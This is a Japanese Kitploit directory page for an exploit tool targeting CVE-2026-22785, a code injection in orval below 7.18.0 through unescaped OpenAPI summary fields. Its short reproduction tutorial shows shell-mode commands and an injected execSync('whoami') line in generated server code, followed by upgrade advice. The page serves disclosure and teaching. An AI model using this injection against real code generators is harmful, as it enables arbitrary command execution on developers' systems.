Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-22785 — CVE-2026-22785用のエクスプロイトツール。orval < 7.18.0における重大なコードインジェクションです。シェルコマンド実行とファイルスキャンを提供し、脆弱性を実証してペイロードインジェクションを検証します。 | Kitploit
ツール/GitHubGitHub/langbyyi/cve-2026-22785
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用学習と教育
GitHublangbyyi/cve-2026-22785

CVE-2026-22785

CVE-2026-22785用のエクスプロイトツール。orval < 7.18.0における重大なコードインジェクションです。シェルコマンド実行とファイルスキャンを提供し、脆弱性を実証してペイロードインジェクションを検証します。

リポジトリを見る
158ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-22785 再現チュートリアル

脆弱性の概要

  • CVE: CVE-2026-22785
  • 影響: orval < 7.18.0
  • 修正: orval >= 7.18.0
  • CVSS: 9.3 CRITICAL
  • タイプ: コードインジェクション

脆弱性の原理

orval < 7.18.0 は MCP サーバーコードを生成する際、OpenAPI 仕様の summary フィールドをテンプレートに直接連結し、エスケープ処理を行わないため、コードインジェクションが発生します。

再現手順

1. 環境準備

root@kitploit:~
cd exploit
npm install

2. ツールの使用

root@kitploit:~
# コマンド実行(脆弱性の悪用)
python cve_tool.py shell <コマンド>

# 例
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir

# ファイルのスキャン
python cve_tool.py scan <ファイル>

3. 出力の説明

root@kitploit:~
<コマンド出力>
[+] CVE-2026-22785: Payload 注入成功
[+] 注入位置: server.ts:31

脆弱性の証拠

server.ts 生成コード:

root@kitploit:~
server.tool(
  'getApiDemo',
  'API.' + require('child_process').execSync('whoami', {}),//',
  getApiDemoHandler
);

防御の推奨事項

  1. orval を >= 7.18.0 にアップグレードする
  2. OpenAPI 仕様のソースを検証する
  3. 生成されたコードをレビューする
ツールをダウンロード